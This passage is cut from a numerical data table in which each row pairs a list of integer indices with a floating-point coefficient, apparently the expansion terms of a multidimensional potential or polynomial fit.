[1,3,7,7,7,11 , -2.79882544901e-13],
[1,3,7,7,8,10 , 1.0752517575e-11],
[1,3,7,7,9,11 , 1.07609720445e-11],
[1,3,7,7,11 , 2.24107388266e-10],
[1,3,7,8,8,11 , 4.10608136469e-12],
[1,3,7,8,9,10 , 3.96173899458e-12],
[1,3,7,8,10 , 4.9516911862e-11],
[1,3,7,9,9,11 , 4.34174558987e-12],
[1,3,7,9,11 , 4.75889708362e-11],
[1,3,7,10,10,11 , 1.23162850532e-12],
[1,3,7,11 , -1.15314515924e-09],
[1,3,7,11,11,11 , 1.86585922509e-12],
[1,3,8 , -9.53441461253e-20],
[1,3,8,8,8,10 , -1.07164775663e-10],
[1,3,8,8,9,11 , -1.07153946353e-10],
[1,3,8,8,11 , -2.41830978146e-09],
[1,3,8,9 , -1.11685926307e-20],
[1,3,8,9,9,10 , -1.06716195113e-10],
[1,3,8,9,10 , -2.40870402771e-09],
[1,3,8,10 , -5.50978326589e-08],
[1,3,8,10,10,10 , -1.16530589495e-10],
[1,3,8,10,11,11 , -1.15663853912e-10],
[1,3,8,11 , -2.74458527245e-20],
[1,3,9,9,9,11 , -1.07127837937e-10],
[1,3,9,9,11 , -2.3819983181e-09],
[1,3,9,10 , 6.31626843939e-20],
[1,3,9,10,10,11 , -1.16541412781e-10],
[1,3,9,11 , -5.45127959763e-08],
[1,3,9,11,11,11 , -1.16481154256e-10],
[1,3,10 , -4.67721005562e-19],
[1,3,10,10,11 , -2.63215349738e-09],
[1,3,11 , -9.83601348706e-07],
[1,3,11,11,11 , -2.63231943333e-09],
[1,4 , -1.35315729904e-20],
[1,6 , -2.05150675051e-20],
[1,11 , 5.08968712059e-20],
[2,2 , 1.93880557094e-05],
[2,2,2,2 , 2.03665082571e-08],
[2,2,2,2,2,2 , -4.34128340472e-11],
[2,2,2,2,3,3 , -3.2577770838e-11],
[2,2,2,2,4,4 , -5.7323562667e-12],
[2,2,2,2,4,10 , 2.61317612065e-13],
[2,2,2,2,5 , -1.13900075879e-10],
[2,2,2,2,5,5 , -2.26376153596e-12],
[2,2,2,2,5,7 , 2.19343993924e-12],
[2,2,2,2,5,9 , -4.66689440431e-12],
[2,2,2,2,6,6 , -4.49389067013e-12],
[2,2,2,2,6,8 , -5.28347404225e-12],
[2,2,2,2,7 , 8.15813438077e-11],
[2,2,2,2,7,7 , -2.80503957612e-12],
[2,2,2,2,7,9 , 1.33665508298e-12],
[2,2,2,2,8,8 , 6.45615036783e-11],
[2,2,2,2,9 , 1.28705965078e-09],
[2,2,2,2,9,9 , 6.26891836187e-11],
[2,2,2,2,10,10 , 7.09874679482e-11],
[2,2,2,2,11,11 , 7.10016256016e-11],
[2,2,2,3,4 , -4.76386101873e-11],
[2,2,2,3,4,5 , 3.53494384308e-12],
[2,2,2,3,4,7 , -3.67150707437e-12],
[2,2,2,3,4,9 , -2.31598086823e-12],
[2,2,2,3,5,10 , 2.28413847637e-12],
[2,2,2,3,6,11 , 2.54206686235e-12],
[2,2,2,3,7,10 , 1.39919592991e-13],
[2,2,2,3,8,11 , -6.25174921617e-11],
[2,2,2,3,9,10 , -6.10595608783e-11],
[2,2,2,3,10 , -1.18688551723e-09],
[2,2,3,3 , 1.32276604419e-08],
[2,2,3,3,3,3 , -2.64132897938e-11],
[2,2,3,3,4,4 , -4.39626014171e-12],
[2,2,3,3,4,10 , 1.37998623894e-12],
[2,2,3,3,5 , -2.0279415992e-11],
[2,2,3,3,5,5 , -2.39956500505e-12],
[2,2,3,3,5,7 , 2.60190436798e-12],
[2,2,3,3,5,9 , -1.09309346709e-12],
[2,2,3,3,6,6 , -5.8707082097e-12],
[2,2,3,3,6,8 , -1.27641446462e-12],
[2,2,3,3,7 , 2.64032431753e-11],
[2,2,3,3,7,7 , -3.54560736521e-12],
[2,2,3,3,7,9 , -8.24299214542e-13],
[2,2,3,3,8,8 , 5.44632540641e-11],
[2,2,3,3,9 , 9.95614876534e-10],
[2,2,3,3,9,9 , 5.24703720982e-11],
[2,2,3,3,10,10 , 5.87051304326e-11],
[2,2,3,3,11,11 , 6.03281134374e-11],
[2,2,4,4 , 2.98368300036e-09],
[2,2,4,4,4,4 , -4.40035547203e-12],
[2,2,4,4,4,10 , 1.01583060619e-12],
[2,2,4,4,5 , 1.79216973139e-11],
[2,2,4,4,5,5 , -2.32023552859e-12],
[2,2,4,4,5,7 , 2.20314864417e-12],
[2,2,4,4,5,9 , 4.66456246392e-13],
[2,2,4,4,6,6 , -5.49629027458e-12],
[2,2,4,4,6,8 , 5.29694269396e-13],
[2,2,4,4,7 , -1.66542688018e-11],
[2,2,4,4,7,7 , -2.44364590061e-12],
[2,2,4,4,7,9 , -9.83458049893e-13],
[2,2,4,4,8,8 , 1.39679999714e-11],
[2,2,4,4,9 , 2.63776985056e-10],
[2,2,4,4,9,9 , 1.33947417408e-11],
[2,2,4,4,10,10 , 1.51941893951e-11],
[2,2,4,4,11,11 , 1.53328495516e-11],
[2,2,4,5,5,10 , -4.7353037045e-13],
[2,2,4,5,6,11 , -8.41719573405e-13],
[2,2,4,5,7,10 , 4.4237018209e-14],
[2,2,4,5,8,11 , 1.15551325391e-11],
[2,2,4,5,9,10 , 1.12240638585e-11],
[2,2,4,5,10 , 2.06659959459e-10],
[2,2,4,6,6,10 , -8.46156670673e-13],
[2,2,4,6,7,11 , 1.01405653082e-13],
[2,2,4,6,8,10 , 1.75046075186e-11],
[2,2,4,6,9,11 , 1.77044928628e-11],
[2,2,4,6,11 , 3.32344393329e-10],
[2,2,4,7,7,10 , 5.76356939694e-13],
[2,2,4,7,8,11 , -1.33113184184e-11],
[2,2,4,7,9,10 , -1.2825603432e-11],
[2,2,4,7,10 , -2.37347847599e-10],
[2,2,4,8,8,10 , -2.36991413442e-12],
[2,2,4,8,9,11 , -2.48719660723e-12],
[2,2,4,8,11 , -3.51348649817e-11],
[2,2,4,9,9,10 , -3.28159223977e-12],
[2,2,4,9,10 , -5.24334508686e-11],
[2,2,4,10 , -7.75838292784e-10],
[2,2,4,10,10,10 , 1.34153278504e-12],
[2,2,4,10,11,11 , 2.01193638322e-12],
[2,2,5 , 1.0559999733e-07],
[2,2,5,5 , 9.75860004004e-10],
[2,2,5,5,5 , -2.97163298548e-11],
[2,2,5,5,5,5 , -5.83793199047e-13],
[2,2,5,5,5,7 , 7.34700838556e-13],
[2,2,5,5,5,9 , -1.22747438827e-12],
[2,2,5,5,6,6 , -1.65289325033e-12],
[2,2,5,5,6,8 , -1.41127250437e-12],
[2,2,5,5,7 , 2.06171268138e-11],
[2,2,5,5,7,7 , -9.58325327059e-13],
[2,2,5,5,7,9 , 9.91231276663e-13],
[2,2,5,5,8,8 , 7.20735453259e-12],
[2,2,5,5,9 , 1.27583876597e-10],
[2,2,5,5,9,9 , 6.96778797281e-12],
[2,2,5,5,10,10 , 8.3251532747e-12],
[2,2,5,5,11,11 , 8.74477996753e-12],
[2,2,5,6,6 , -4.6422604917e-11],
[2,2,5,6,6,7 , 1.9746892107e-12],
[2,2,5,6,6,9 , -1.92578422362e-12],
[2,2,5,6,7,8 , 1.11385966081e-12],
[2,2,5,6,8 , 1.8740568569e-10],
[2,2,5,6,8,9 , 1.14006853295e-11],
[2,2,5,6,10,11 , 1.39352891164e-11],
[2,2,5,7 , -1.13805469061e-09],
[2,2,5,7,7 , -1.80794553453e-11],
[2,2,5,7,7,7 , 1.19029194045e-12],
[2,2,5,7,7,9 , -6.7496495539e-13],
[2,2,5,7,8,8 , -9.00728389703e-12],
[2,2,5,7,9 , -1.49395128663e-10],
[2,2,5,7,9,9 , -8.87820186059e-12],
[2,2,5,7,10,10 , -1.03977105046e-11],
[2,2,5,7,11,11 , -1.08385715983e-11],
[2,2,5,8,8 , 1.03943982735e-10],
[2,2,5,8,8,9 , 3.20449439231e-12],
[2,2,5,8,10,11 , 5.24407473423e-12],
[2,2,5,9 , 3.51475056345e-09],
[2,2,5,9,9 , 1.00039955581e-10],
[2,2,5,9,9,9 , 2.7996180874e-12],
[2,2,5,9,10,10 , 4.90881744067e-12],
[2,2,5,9,11,11 , 5.5582219469e-12],
[2,2,5,10,10 , 1.25227738206e-10],
[2,2,5,11,11 , 1.38807786895e-10],
[2,2,6 , 8.80120171756e-20],
[2,2,6,6 , 2.23330749708e-09],
[2,2,6,6,6,6 , -4.30890670247e-12],
[2,2,6,6,6,8 , -2.68431457393e-12],
[2,2,6,6,7 , 3.92460537246e-11],
[2,2,6,6,7,7 , -2.57315368325e-12],
[2,2,6,6,7,9 , 1.34121599537e-12],
[2,2,6,6,8,8 , 1.74978868208e-11],
[2,2,6,6,9 , 3.01765263284e-10],
[2,2,6,6,9,9 , 1.68393474378e-11],
[2,2,6,6,10,10 , 2.10196191675e-11],
[2,2,6,6,11,11 , 2.08834708603e-11],
[2,2,6,7,7,8 , -5.82627371878e-13],
[2,2,6,7,8 , -2.33565805424e-10],
[2,2,6,7,8,9 , -1.3770053845e-11],
[2,2,6,7,10,11 , -1.66148697817e-11],
[2,2,6,8 , 4.26748873087e-09],
[2,2,6,8,8,8 , 1.48298407692e-12],
[2,2,6,8,9 , 9.34332578212e-11],
[2,2,6,8,9,9 , 1.3759998026e-12],
[2,2,6,8,10,10 , 4.66160090975e-12],
[2,2,6,8,11,11 , 4.94740775764e-12],
[2,2,6,9,10,11 , 4.27118607471e-12],
[2,2,6,10,11 , 1.33180432384e-10],
[2,2,7 , -1.27819926452e-07],
[2,2,7,7 , 1.06918319574e-09],
[2,2,7,7,7 , 1.30501599213e-11],
[2,2,7,7,7,7 , -1.80536579028e-12],
[2,2,7,7,7,9 , 3.23363366026e-13],
[2,2,7,7,8,8 , 1.0127189355e-11],
[2,2,7,7,9 , 1.89089710687e-10],
[2,2,7,7,9,9 , 9.54643470603e-12],
[2,2,7,7,10,10 , 1.17161276898e-11],
[2,2,7,7,11,11 , 1.20526155215e-11],
[2,2,7,8,8 , 4.7396508449e-11],
[2,2,7,8,8,9 , 4.60636853336e-12],
[2,2,7,8,10,11 , 2.33169368374e-12],
[2,2,7,9 , -1.1321264682e-09],
[2,2,7,9,9 , 4.99742301716e-11],
[2,2,7,9,9,9 , 6.7278285289e-12],
[2,2,7,9,10,10 , 3.19255158649e-12],
[2,2,7,9,11,11 , 2.61253957301e-12],
[2,2,7,10,10 , 1.96087549647e-11],
[2,2,7,11,11 , 2.15698883112e-11],
[2,2,8 , -2.20969720115e-18],
[2,2,8,8 , -5.81996475268e-08],
[2,2,8,8,8 , -1.34246760526e-20],
[2,2,8,8,8,8 , -1.12982132378e-10],
[2,2,8,8,9 , -2.506738615e-09],
[2,2,8,8,9,9 , -1.13086598601e-10],
[2,2,8,8,10,10 , -1.25338926617e-10],
[2,2,8,8,11,11 , -1.25495990537e-10],
[2,2,8,9 , -2.93657389262e-20],
[2,2,8,9,10,11 , -1.23938086037e-10],
[2,2,8,10,10 , -1.03889232046e-20],
[2,2,8,10,11 , -2.82710855224e-09],
[2,2,9 , -1.040868425e-06],
[2,2,9,9 , -5.79389171774e-08],
[2,2,9,9,9 , -2.42599039176e-09],
[2,2,9,9,9,9 , -1.25154127409e-10],
[2,2,9,9,10,10 , -1.25726350217e-10],
[2,2,9,9,11,11 , -1.27208424324e-10],
[2,2,9,10,10 , -2.79159072076e-09],
[2,2,9,11,11 , -2.83254138255e-09],
[2,2,10 , 1.7808867716e-19],
[2,2,10,10 , -6.5691021178e-08],
[2,2,10,10,10,10 , -1.34917279016e-10],
[2,2,10,10,11,11 , -1.35604981234e-10],
[2,2,10,11 , -3.55770381459e-20],
[2,2,11,11 , -6.72895909187e-08],
[2,2,11,11,11,11 , -1.4160912509e-10],
[2,3 , 1.10114283143e-20],
[2,3,3,3,4 , -5.21687319561e-11],
[2,3,3,3,4,5 , 3.05871357799e-12],
[2,3,3,3,4,7 , -3.01795503215e-12],
[2,3,3,3,4,9 , -2.15264095591e-12],
[2,3,3,3,5,10 , 1.4149688791e-12],
[2,3,3,3,6,11 , 1.21627616343e-12],
[2,3,3,3,7,10 , 2.96519271781e-13],
[2,3,3,3,8,11 , -5.22825489402e-11],
[2,3,3,3,9,10 , -5.0675037201e-11],
[2,3,3,3,10 , -9.5999387568e-10],
[2,3,4 , 4.52107354114e-08],
[2,3,4,4,4 , -5.84394894226e-11],
[2,3,4,4,4,5 , 2.66904516125e-12],
[2,3,4,4,4,7 , -2.38287963938e-12],
[2,3,4,4,4,9 , -2.08758638586e-12],
[2,3,4,4,5,10 , -3.44761885833e-13],
[2,3,4,4,6,11 , -4.43031644153e-13],
[2,3,4,4,7,10 , 7.67478935573e-13],
[2,3,4,4,8,11 , -1.40094903221e-11],
[2,3,4,4,9,10 , -1.36568760119e-11],
[2,3,4,4,10 , -2.54139338473e-10],
[2,3,4,5 , -1.89779050616e-09],
[2,3,4,5,5 , -1.22829324497e-11],
[2,3,4,5,5,5 , 1.5862825614e-12],
[2,3,4,5,5,7 , -1.66562948533e-12],
[2,3,4,5,5,9 , -2.60084772191e-13],
[2,3,4,5,6,6 , 3.69480381557e-12],
[2,3,4,5,6,8 , -9.70266855881e-14],
[2,3,4,5,7 , 6.73993637789e-12],
[2,3,4,5,7,7 , 1.88611796773e-12],
[2,3,4,5,7,9 , 4.6919803232e-13],
[2,3,4,5,8,8 , -1.02433422711e-11],
[2,3,4,5,9 , -1.82030766027e-10],
[2,3,4,5,9,9 , -1.00801798429e-11],
[2,3,4,5,10,10 , -1.12417197455e-11],
[2,3,4,5,11,11 , -1.1454226572e-11],
[2,3,4,6,6 , -1.3765590788e-11],
[2,3,4,6,6,7 , -4.15540350083e-12],
[2,3,4,6,6,9 , -7.52671691685e-13],
[2,3,4,6,7,8 , 6.34758869718e-13],
[2,3,4,6,8 , -2.93455407435e-10],
[2,3,4,6,8,9 , -1.5670640789e-11],
[2,3,4,6,10,11 , -1.72452514907e-11],
[2,3,4,7 , 2.41762315308e-09],
[2,3,4,7,7 , -5.56103562752e-12],
[2,3,4,7,7,7 , -2.12373171376e-12],
[2,3,4,7,7,9 , -7.7325184343e-13],
[2,3,4,7,8,8 , 1.19111285527e-11],
[2,3,4,7,9 , 2.01657232497e-10],
[2,3,4,7,9,9 , 1.12313083698e-11],
[2,3,4,7,10,10 , 1.29920372737e-11],
[2,3,4,7,11,11 , 1.30996705094e-11],
[2,3,4,8,8 , 8.00618924298e-11],
[2,3,4,8,8,9 , 4.63191766481e-12],
[2,3,4,8,10,11 , 8.23689175102e-13],
[2,3,4,9 , 2.26169263797e-09],
[2,3,4,9,9 , 1.08397630997e-10],
[2,3,4,9,9,9 , 5.49492647868e-12],
[2,3,4,9,10,10 , 1.11091703314e-12],
[2,3,4,9,11,11 , 8.89421719587e-13],
[2,3,4,10,10 , 3.36603310673e-12],
[2,3,4,11,11 , 1.12229070317e-12],
[2,3,5,5,5,10 , 6.47709702835e-13],
[2,3,5,5,6,11 , 8.97054755689e-13],
[2,3,5,5,7,10 , -4.32781362816e-13],
[2,3,5,5,8,11 , -7.93969037678e-12],
[2,3,5,5,9,10 , -7.78738400745e-12],
[2,3,5,5,10 , -1.46991865173e-10],
[2,3,5,6,6,10 , 9.92547985039e-13],
[2,3,5,6,7,11 , -5.24015561508e-13],
[2,3,5,6,8,10 , -1.21655008169e-11],
[2,3,5,6,9,11 , -1.22432653578e-11],
[2,3,5,6,11 , -2.3057273326e-10],
[2,3,5,7,7,10 , -6.12167217749e-14],
[2,3,5,7,8,11 , 9.44341366643e-12],
[2,3,5,7,9,10 , 9.25700675148e-12],
[2,3,5,7,10 , 1.74475510404e-10],
[2,3,5,8,8,10 , -3.23817920286e-12],
[2,3,5,8,9,11 , -2.64209971454e-12],
[2,3,5,8,11 , -8.01723584367e-11],
[2,3,5,9,9,10 , -2.35915238901e-12],
[2,3,5,9,10 , -7.37714857157e-11],
[2,3,5,10 , -2.05759901257e-09],
[2,3,5,10,10,10 , -6.17173800304e-12],
[2,3,5,10,11,11 , -5.46487828228e-12],
[2,3,6,6,6,11 , 1.4308322083e-12],
[2,3,6,6,7,10 , -3.13282743548e-13],
[2,3,6,6,8,11 , -1.90091888814e-11],
[2,3,6,6,9,10 , -1.89218459313e-11],
[2,3,6,6,10 , -3.61151999462e-10],
[2,3,6,7,7,11 , -1.85790724107e-13],
[2,3,6,7,8,10 , 1.47030315442e-11],
[2,3,6,7,9,11 , 1.44454927523e-11],
[2,3,6,7,11 , 2.81994051921e-10],
[2,3,6,8,8,11 , -1.66113420818e-12],
[2,3,6,8,9,10 , -1.14950125242e-12],
[2,3,6,8,10 , -7.47573713775e-11],
[2,3,6,9,9,11 , -5.71765502975e-13],
[2,3,6,9,11 , -5.55723406449e-11],
[2,3,6,10,10,11 , -5.9395076655e-12],
[2,3,6,11 , -2.79291443077e-09],
[2,3,6,11,11,11 , -5.38479676364e-12],
[2,3,7,7,7,10 , 3.83388221985e-13],
[2,3,7,7,8,11 , -1.11562133455e-11],
[2,3,7,7,9,10 , -1.09302007897e-11],
[2,3,7,7,10 , -2.20723101737e-10],
[2,3,7,8,8,10 , -4.03988606976e-12],
[2,3,7,8,9,11 , -4.02875015367e-12],
[2,3,7,8,11 , -5.05816812367e-11],
[2,3,7,9,9,10 , -4.83307980453e-12],
[2,3,7,9,10 , -4.7363276543e-11],
[2,3,7,10 , 1.02639961807e-09],
[2,3,7,10,10,10 , -2.4313444792e-12],
[2,3,7,10,11,11 , -1.28814936552e-12],
[2,3,8,8,8,11 , 1.09846701344e-10],
[2,3,8,8,9,10 , 1.10077973315e-10],
[2,3,8,8,10 , 2.49073830452e-09],
[2,3,8,9,9,11 , 1.09999062665e-10],
[2,3,8,9,11 , 2.48722217469e-09],
[2,3,8,10 , 1.49975289681e-19],
[2,3,8,10,10,11 , 1.20524908008e-10],
[2,3,8,11 , 5.76767060632e-08],
[2,3,8,11,11,11 , 1.19491239355e-10],
[2,3,9 , 1.04555629427e-19],
[2,3,9,9 , 1.19329075167e-20],
[2,3,9,9,9,10 , 1.09931607074e-10],
[2,3,9,9,10 , 2.4624586216e-09],
[2,3,9,10 , 5.65397771681e-08],
[2,3,9,10,10,10 , 1.20970925013e-10],
[2,3,9,10,11,11 , 1.20360072451e-10],
[2,3,9,11 , -1.23674254925e-19],
[2,3,10 , 9.9168227174e-07],
[2,3,10,10 , -1.19982547851e-20],
[2,3,10,10,10 , 2.7151923596e-09],
[2,3,10,11,11 , 2.72127566694e-09],
[2,3,11 , -5.34689547954e-19],
[2,8 , 1.40847322784e-20],
[2,9 , 1.07059626737e-20],
[3,3 , 2.29234030592e-05],
[3,3,3,3 , 1.07095902036e-08],
[3,3,3,3,3,3 , -2.35006377739e-11],
[3,3,3,3,4,4 , -4.21227532134e-12],
[3,3,3,3,4,10 , 1.4289684998e-12],
[3,3,3,3,5 , 2.42232112361e-11],
[3,3,3,3,5,5 , -1.58517912054e-12],
[3,3,3,3,5,7 , 1.65852354126e-12],
[3,3,3,3,5,9 , 5.7085700904e-14],
[3,3,3,3,6,6 , -3.80641204131e-12],
[3,3,3,3,6,8 , 1.02272388515e-12],
[3,3,3,3,7 , -2.14440401982e-12],
[3,3,3,3,7,7 , -2.75740255143e-12],
[3,3,3,3,7,9 , -1.39471887634e-12],
[3,3,3,3,8,8 , 4.75775196207e-11],
[3,3,3,3,9 , 8.5320656872e-10],
[3,3,3,3,9,9 , 4.34538359844e-11],
[3,3,3,3,10,10 , 4.75620564758e-11],
[3,3,3,3,11,11 , 4.8489024354e-11],
[3,3,4,4 , 2.65213858396e-09],
[3,3,4,4,4,4 , -3.92408734658e-12],
[3,3,4,4,4,10 , 1.25430379437e-12],
[3,3,4,4,5 , 3.09152914718e-11],
[3,3,4,4,5,5 , -1.83991898697e-12],
[3,3,4,4,5,7 , 1.69266796256e-12],
[3,3,4,4,5,9 , 8.64786239799e-13],
[3,3,4,4,6,6 , -4.25873074356e-12],
[3,3,4,4,6,8 , 1.1638185756e-12],
[3,3,4,4,7 , -2.32542991815e-11],
[3,3,4,4,7,7 , -2.04709261675e-12],
[3,3,4,4,7,9 , -1.21537025927e-12],
[3,3,4,4,8,8 , 1.22757950805e-11],
[3,3,4,4,9 , 2.29151323316e-10],
[3,3,4,4,9,9 , 1.15751594641e-11],
[3,3,4,4,10,10 , 1.29133158534e-11],
[3,3,4,4,11,11 , 1.27210688919e-11],
[3,3,4,5,5,10 , -1.43877117366e-13],
[3,3,4,5,6,11 , -2.53704389407e-13],
[3,3,4,5,7,10 , -1.73613280511e-13],
[3,3,4,5,8,11 , 9.64178759512e-12],
[3,3,4,5,9,10 , 9.47371245673e-12],
[3,3,4,5,10 , 1.73901802173e-10],
[3,3,4,6,6,10 , -2.72078738709e-13],
[3,3,4,6,7,11 , -2.35639587563e-13],
[3,3,4,6,8,10 , 1.46664814637e-11],
[3,3,4,6,9,11 , 1.45764313247e-11],
[3,3,4,6,11 , 2.72380513954e-10],
[3,3,4,7,7,10 , 5.17034515612e-13],
[3,3,4,7,8,11 , -1.11721427606e-11],
[3,3,4,7,9,10 , -1.07650653728e-11],
[3,3,4,7,10 , -1.97089767132e-10],
[3,3,4,8,8,10 , -2.74224309503e-12],
[3,3,4,8,9,11 , -3.11876802434e-12],
[3,3,4,8,11 , -5.81464478895e-11],
[3,3,4,9,9,10 , -3.590741557e-12],
[3,3,4,9,10 , -7.06591512893e-11],
[3,3,4,10 , -1.82797670985e-09],
[3,3,4,10,10,10 , 1.32800398993e-12],
[3,3,4,10,11,11 , 1.24397585768e-12],
[3,3,5 , -7.72659314388e-08],
[3,3,5,5 , -3.73156918017e-11],
[3,3,5,5,5 , 4.53839292635e-12],
[3,3,5,5,5,5 , -1.20575655739e-12],
[3,3,5,5,5,7 , 1.00356201146e-12],
[3,3,5,5,5,9 , -3.35593417012e-13],
[3,3,5,5,6,6 , -1.8501840579e-12],
[3,3,5,5,6,8 , -7.12971368814e-13],
[3,3,5,5,7 , 3.69309301696e-12],
[3,3,5,5,7,7 , -1.10058988041e-12],
[3,3,5,5,7,9 , 3.11890240602e-13],
[3,3,5,5,8,8 , 5.99632847193e-12],
[3,3,5,5,9 , 9.79589781096e-11],
[3,3,5,5,9,9 , 5.54692867132e-12],
[3,3,5,5,10,10 , 7.3899564828e-12],
[3,3,5,5,11,11 , 7.36346014907e-12],
[3,3,5,6,6 , -1.6788991631e-11],
[3,3,5,6,6,7 , 2.07850112663e-12],
[3,3,5,6,6,9 , -8.98189729351e-13],
[3,3,5,6,7,8 , 3.52129663916e-13],
[3,3,5,6,8 , 1.5924931272e-10],
[3,3,5,6,8,9 , 9.48838828117e-12],
[3,3,5,6,10,11 , 1.1927331296e-11],
[3,3,5,7 , -7.05939381078e-10],
[3,3,5,7,7 , -4.83824378888e-12],
[3,3,5,7,7,7 , 1.48526065038e-12],
[3,3,5,7,7,9 , 4.98352940244e-14],
[3,3,5,7,8,8 , -7.17049914253e-12],
[3,3,5,7,9 , -1.1752626184e-10],
[3,3,5,7,9,9 , -7.0089263821e-12],
[3,3,5,7,10,10 , -8.96479337948e-12],
[3,3,5,7,11,11 , -8.89649916785e-12],
[3,3,5,8,8 , -5.83444759794e-12],
[3,3,5,8,8,9 , -8.32892617305e-14],
[3,3,5,8,10,11 , 3.88916021527e-12],
[3,3,5,9 , -1.02596665269e-09],
[3,3,5,9,9 , -1.19700454816e-11],
[3,3,5,9,9,9 , 8.44772302296e-14],
[3,3,5,9,10,10 , 3.66979840503e-12],
[3,3,5,9,11,11 , 3.52482866157e-12],
[3,3,5,10,10 , 1.0132503124e-10],
[3,3,5,11,11 , 9.74313427328e-11],
[3,3,6,6 , 1.48071534859e-09],
[3,3,6,6,6,6 , -5.24798436089e-12],
[3,3,6,6,6,8 , -1.42011509742e-12],
[3,3,6,6,7 , 2.82856929004e-11],
[3,3,6,6,7,7 , -2.8896712322e-12],
[3,3,6,6,7,9 , 5.11206079522e-13],
[3,3,6,6,8,8 , 1.43134298469e-11],
[3,3,6,6,9 , 2.52292690521e-10],
[3,3,6,6,9,9 , 1.395061672e-11],
[3,3,6,6,10,10 , 1.80966243398e-11],
[3,3,6,6,11,11 , 1.8077643094e-11],
[3,3,6,7,7,8 , 4.31217055533e-13],
[3,3,6,7,8 , -2.07518875214e-10],
[3,3,6,7,8,9 , -1.13003156388e-11],
[3,3,6,7,10,11 , -1.41131371554e-11],
[3,3,6,8 , -1.25482372045e-09],
[3,3,6,8,8,8 , -2.46373867411e-12],
[3,3,6,8,9 , -5.25956184896e-11],
[3,3,6,8,9,9 , -2.76375487033e-12],
[3,3,6,8,10,10 , 3.56269593869e-12],
[3,3,6,8,11,11 , 3.4324247504e-12],
[3,3,6,9,10,11 , 2.91939207359e-12],
[3,3,6,10,11 , 1.02989516471e-10],
[3,3,7 , -3.90227734042e-08],
[3,3,7,7 , 1.55176942474e-09],
[3,3,7,7,7 , 1.27529882005e-11],
[3,3,7,7,7,7 , -2.39649557168e-12],
[3,3,7,7,7,9 , -1.63623402963e-13],
[3,3,7,7,8,8 , 8.13799091564e-12],
[3,3,7,7,9 , 1.7626598803e-10],
[3,3,7,7,9,9 , 8.03968607248e-12],
[3,3,7,7,10,10 , 1.03639416774e-11],
[3,3,7,7,11,11 , 1.04129383366e-11],
[3,3,7,8,8 , 1.36200714614e-10],
[3,3,7,8,8,9 , 6.48349719415e-12],
[3,3,7,8,10,11 , 1.72219582153e-12],
[3,3,7,9 , 8.49310265012e-10],
[3,3,7,9,9 , 1.07474367473e-10],
[3,3,7,9,9,9 , 7.77502675636e-12],
[3,3,7,9,10,10 , 2.68883369949e-12],
[3,3,7,9,11,11 , 2.38653144229e-12],
[3,3,7,10,10 , 1.49494061742e-11],
[3,3,7,11,11 , 1.29760142486e-11],
[3,3,8 , -1.33820617754e-18],
[3,3,8,8 , -5.30057657229e-08],
[3,3,8,8,8 , -1.0541563877e-20],
[3,3,8,8,8,8 , -1.0110320206e-10],
[3,3,8,8,9 , -2.1973688977e-09],
[3,3,8,8,9,9 , -9.78338103032e-11],
[3,3,8,8,10,10 , -1.07197100794e-10],
[3,3,8,8,11,11 , -1.06795210306e-10],
[3,3,8,9,10,11 , -1.05603102784e-10],
[3,3,8,10,11 , -2.35717361846e-09],
[3,3,9 , -8.56459413189e-07],
[3,3,9,9 , -5.05099970999e-08],
[3,3,9,9,9 , -2.10861046555e-09],
[3,3,9,9,9,9 , -1.06662473696e-10],
[3,3,9,9,10,10 , -1.06617713053e-10],
[3,3,9,9,11,11 , -1.06398036853e-10],
[3,3,9,10,10 , -2.3484935158e-09],
[3,3,9,11,11 , -2.34841593093e-09],
[3,3,10 , 3.67400540872e-20],
[3,3,10,10 , -5.47420372031e-08],
[3,3,10,10,10,10 , -1.16795275808e-10],
[3,3,10,10,11,11 , -1.15601788013e-10],
[3,3,11 , -1.63318540142e-20],
[3,3,11,11 , -5.54410862721e-08],
[3,3,11,11,11,11 , -1.18612580297e-10],
[3,4 , -3.1303535339e-20],
[3,10 , 1.98510820637e-20],
[3,11 , 1.03925736111e-20],
[4,4 , 3.22700568421e-05],
[4,4,4,4 , 7.36912532987e-09],
[4,4,4,4,4,4 , -2.26359326278e-11],
[4,4,4,4,4,10 , 3.06865333013e-12],
[4,4,4,4,5 , 8.70139532011e-11],
[4,4,4,4,5,5 , -7.70909437139e-12],
[4,4,4,4,5,7 , 8.05868751487e-12],
[4,4,4,4,5,9 , 3.44893768521e-12],
[4,4,4,4,6,6 , -2.00368256909e-11],
[4,4,4,4,6,8 , 5.33360171818e-12],
[4,4,4,4,7 , -1.38139428602e-10],
[4,4,4,4,7,7 , -7.62071995033e-12],
[4,4,4,4,7,9 , -5.15187293561e-12],
[4,4,4,4,8,8 , 2.82128755671e-11],
[4,4,4,4,9 , 5.5562911742e-10],
[4,4,4,4,9,9 , 2.68985131444e-11],
[4,4,4,4,10,10 , 2.94274897611e-11],
[4,4,4,4,11,11 , 2.99408583004e-11],
[4,4,4,5,5,10 , -1.93730407647e-13],
[4,4,4,5,6,11 , -3.92663743391e-15],
[4,4,4,5,7,10 , -1.17991042282e-12],
[4,4,4,5,8,11 , 2.32757624973e-11],
[4,4,4,5,9,10 , 2.2933304366e-11],
[4,4,4,5,10 , 4.36298422455e-10],
[4,4,4,6,6,10 , -1.9043182339e-13],
[4,4,4,6,7,11 , -1.74637746583e-12],
[4,4,4,6,8,10 , 3.54600746662e-11],
[4,4,4,6,9,11 , 3.52721147034e-11],
[4,4,4,6,11 , 6.6122786557e-10],
[4,4,4,7,7,10 , 2.95589398167e-12],
[4,4,4,7,8,11 , -2.6398403552e-11],
[4,4,4,7,9,10 , -2.55189891445e-11],
[4,4,4,7,10 , -4.68174210267e-10],
[4,4,4,8,8,10 , -7.24853945443e-12],
[4,4,4,8,9,11 , -7.83699461241e-12],
[4,4,4,8,11 , -1.50221410327e-10],
[4,4,4,9,9,10 , -8.17530733461e-12],
[4,4,4,9,10 , -1.71396282106e-10],
[4,4,4,10 , -5.97576870093e-09],
[4,4,4,10,10,10 , 3.0658973375e-12],
[4,4,4,10,11,11 , 2.17153722446e-12],
[4,4,5 , -1.56534976008e-07],
[4,4,5,5 , 2.62630207843e-09],
[4,4,5,5,5 , 2.45308223746e-11],
[4,4,5,5,5,5 , -4.84748437962e-12],
[4,4,5,5,5,7 , 4.55635683502e-12],
[4,4,5,5,5,9 , -1.0555500818e-13],
[4,4,5,5,6,6 , -9.87251396945e-12],
[4,4,5,5,6,8 , -1.0519922474e-13],
[4,4,5,5,7 , -3.07724110027e-12],
[4,4,5,5,7,7 , -5.64625853669e-12],
[4,4,5,5,7,9 , -1.03683181705e-12],
[4,4,5,5,8,8 , 1.63245514021e-11],
[4,4,5,5,9 , 3.22708066061e-10],
[4,4,5,5,9,9 , 1.61005041135e-11],
